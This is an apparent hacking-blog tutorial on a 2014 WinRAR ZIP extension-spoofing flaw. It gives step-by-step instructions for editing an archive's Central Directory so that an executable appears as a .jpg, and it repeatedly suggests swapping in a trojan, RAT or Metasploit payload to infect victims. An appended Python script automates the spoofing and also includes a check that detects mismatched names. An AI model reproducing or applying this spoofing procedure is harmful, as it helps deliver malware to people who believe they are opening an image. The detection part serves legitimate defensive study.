Sunday, 4 May 2014

WinRAR File Extension Spoofing 0day

In March 2014, a WinRAR file extension spoofing 0day was used in the wild to compromise many Windows users.
In this tutorial, I will explain this vulnerability with some POC images and a video created by my friend Gujjar-Haxor (Pak Cyber Pirates).

Vulnerability Description:

A ZIP archive stores every entry's file name twice: once in the Local File Header that sits just before the entry's data, and once in the Central Directory at the end of the archive. The file names WinRAR shows in its file list when opening a ZIP come from the Central Directory, but the file name it uses when extracting or opening an entry comes from the Local File Header, and WinRAR never checked that the two agree. This inconsistency allows an attacker to spoof the displayed file name (for example, show an .exe as a .jpg), which can be abused to execute arbitrary code when the victim double-clicks the entry.

NOTE:

This tutorial was found working under a Windows 7 environment. For some reason, it didn't work for my friends using Windows 8. So, try it on Win 7 if it doesn't work for you on Win 8. Thanks.

POC:

1- Get a portable executable file. In this tutorial, I am using the Havij software, which is an SQL injection tool, but an attacker would use a trojan or RAT to infect the victim.

2- Right-click the exe file and click "Add to archive". Choose the ZIP archive format to compress the file into a ZIP archive.

3- Run Hex Workshop or any other hex editor and open the compressed ZIP archive in it. Go to the end of the file (this is the Central Directory) and find the second occurrence of havij.exe; change its extension to jpg so it reads havij.jpg. Leave the first occurrence near the start of the file (the Local File Header) untouched, because that is the name WinRAR uses when it opens the entry. Keep the new name the same length as the old one: exe and jpg are both three characters, so the file name length fields and every offset in the archive stay valid.

4- Now open the ZIP archive in WinRAR. The file list shows a havij.jpg entry with an image icon. When you double-click it, WinRAR extracts the entry under its Local File Header name and runs the original havij.exe.
(This is just a demonstration; an attacker would use a Metasploit payload, trojan or RAT instead of havij.exe.)
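The same four steps, as an added Python example that is not part of the original post or its author's work: the script builds a one-entry ZIP whose two headers both say havij.exe, then rewrites only the Central Directory copy to havij.jpg exactly as the hex-editor step does, and it also carries the consistency check WinRAR was missing. The payload bytes are a constructed placeholder, not Havij or any real executable, and the function and constant names are this example's own.

```python
import io
import struct
import zipfile

LOCAL_SIG = b"PK\x03\x04"    # Local File Header, sits just before each entry's data
CENTRAL_SIG = b"PK\x01\x02"  # Central Directory file header, near the end of the archive
EOCD_SIG = b"PK\x05\x06"     # End of Central Directory record, the last structure in the file

# Constructed stand-in for the executable; it is not Havij or a valid PE file.
FAKE_EXE = b"MZ" + b"\x00" * 62 + b"constructed placeholder payload"


def build_zip(name: str, data: bytes) -> bytes:
    """Create a one-entry ZIP the normal way, so both headers carry the same name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, data)
    return buf.getvalue()


def central_entries(zip_bytes: bytes):
    """Walk the Central Directory; yield (name_offset, name, local_header_offset)."""
    eocd = zip_bytes.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no End of Central Directory record")
    total = struct.unpack_from("<H", zip_bytes, eocd + 10)[0]   # total entries
    pos = struct.unpack_from("<I", zip_bytes, eocd + 16)[0]     # Central Directory offset
    for _ in range(total):
        if zip_bytes[pos:pos + 4] != CENTRAL_SIG:
            raise ValueError("corrupt Central Directory")
        name_len, extra_len, comment_len = struct.unpack_from("<HHH", zip_bytes, pos + 28)
        local_off = struct.unpack_from("<I", zip_bytes, pos + 42)[0]
        name_off = pos + 46                                     # fixed header is 46 bytes
        yield name_off, zip_bytes[name_off:name_off + name_len], local_off
        pos = name_off + name_len + extra_len + comment_len


def local_name(zip_bytes: bytes, local_off: int) -> bytes:
    """Read the name WinRAR used when extracting: the one in the Local File Header."""
    if zip_bytes[local_off:local_off + 4] != LOCAL_SIG:
        raise ValueError("corrupt Local File Header")
    name_len = struct.unpack_from("<H", zip_bytes, local_off + 26)[0]
    return zip_bytes[local_off + 30:local_off + 30 + name_len]  # fixed header is 30 bytes


def spoof_central_name(zip_bytes: bytes, original: str, spoofed: str) -> bytes:
    """Rewrite only the Central Directory copy of the name, as the hex-editor step does.

    The replacement must keep the same length so that no length field or offset in
    the archive changes; that is why exe -> jpg works in the tutorial.
    """
    old, new = original.encode(), spoofed.encode()
    if len(old) != len(new):
        raise ValueError("replacement name must keep the same length")
    out = bytearray(zip_bytes)
    hits = 0
    for name_off, name, _ in central_entries(zip_bytes):
        if name == old:
            out[name_off:name_off + len(old)] = new
            hits += 1
    if hits == 0:
        raise ValueError(f"{original} not found in Central Directory")
    return bytes(out)


def find_name_mismatches(zip_bytes: bytes) -> list:
    """The check WinRAR lacked: flag every entry whose two names disagree."""
    mismatches = []
    for _, central, local_off in central_entries(zip_bytes):
        local = local_name(zip_bytes, local_off)
        if local != central:
            mismatches.append((local.decode(), central.decode()))
    return mismatches


def listed_names(zip_bytes: bytes) -> list:
    """What a Central-Directory-driven file list shows (zipfile here, WinRAR's pane there)."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return zf.namelist()


def python_can_open(zip_bytes: bytes, name: str) -> bool:
    """zipfile compares the two names before extracting and rejects a mismatch."""
    try:
        with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
            zf.read(name)
        return True
    except zipfile.BadZipFile:
        return False


CLEAN = build_zip("havij.exe", FAKE_EXE)
SPOOFED = spoof_central_name(CLEAN, "havij.exe", "havij.jpg")

if __name__ == "__main__":
    print("file list shows:", listed_names(SPOOFED))
    print("mismatched entries (local, central):", find_name_mismatches(SPOOFED))
    print("zipfile lets you open havij.jpg:", python_can_open(SPOOFED, "havij.jpg"))
```

On the spoofed archive, `listed_names` reports havij.jpg just as WinRAR's file list did, while `find_name_mismatches` returns the (havij.exe, havij.jpg) pair. Python's zipfile already does that comparison when an entry is opened and raises BadZipFile on a mismatch, so `python_can_open` returns False for the spoofed entry; running `find_name_mismatches` over incoming archives gives the same protection in front of a tool that does not make the check.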

Watch Video Tutorial: